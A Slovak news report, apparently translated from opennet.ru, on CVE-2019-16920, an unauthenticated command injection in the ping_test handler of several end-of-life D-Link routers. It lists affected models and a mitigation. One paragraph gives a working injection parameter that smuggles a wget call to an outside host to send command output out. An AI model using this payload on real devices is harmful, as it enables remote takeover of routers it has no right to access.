Vzdialene zneužiteľná zraniteľnosť v smerovačoch D-Link

V bezdrôtových smerovačoch D-Link identifikované nebezpečná zraniteľnosť (CVE-2019-16920), ktorý vám umožňuje na diaľku spustiť kód na strane zariadenia odoslaním špeciálnej požiadavky obsluhe „ping_test“, ktorá je prístupná bez autentifikácie.

Je zaujímavé, že podľa vývojárov firmvéru by sa volanie „ping_test“ malo vykonať až po autentifikácii, ale v skutočnosti sa volá v každom prípade bez ohľadu na prihlásenie do webového rozhrania. Najmä pri prístupe k skriptu apply_sec.cgi a odovzdaní parametra „action=ping_test“ sa skript presmeruje na autentifikačnú stránku, ale súčasne vykoná akciu spojenú s ping_test. Na spustenie kódu bola použitá ďalšia zraniteľnosť v samotnom ping_teste, ktorá volá utilitu ping bez toho, aby správne skontrolovala správnosť IP adresy odoslanej na testovanie. Ak chcete napríklad zavolať pomocný program wget a preniesť výsledky príkazu „echo 1234“ do externého hostiteľa, stačí zadať parameter „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Vzdialene zneužiteľná zraniteľnosť v smerovačoch D-Link

Prítomnosť zraniteľnosti bola oficiálne potvrdená v nasledujúcich modeloch:

  • DIR-655 s firmvérom 3.02b05 alebo starším;
  • DIR-866L s firmvérom 1.03b04 alebo starším;
  • DIR-1565 s firmvérom 1.01 alebo starším;
  • DIR-652 (neposkytujú sa žiadne informácie o problematických verziách firmvéru)

Doba podpory pre tieto modely už vypršala, preto D-Link uviedol, ktorá pre nich nevydá aktualizácie na odstránenie zraniteľnosti, neodporúča ich používať a radí nahradiť ich novými zariadeniami. Ako riešenie zabezpečenia môžete obmedziť prístup k webovému rozhraniu iba na dôveryhodné adresy IP.

Neskôr sa zistilo, že zraniteľnosť bola tiež ovplyvňuje modely DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 a DIR-825, plány vydávania aktualizácií zatiaľ nie sú známe.

Zdroj: opennet.ru

Pridať komentár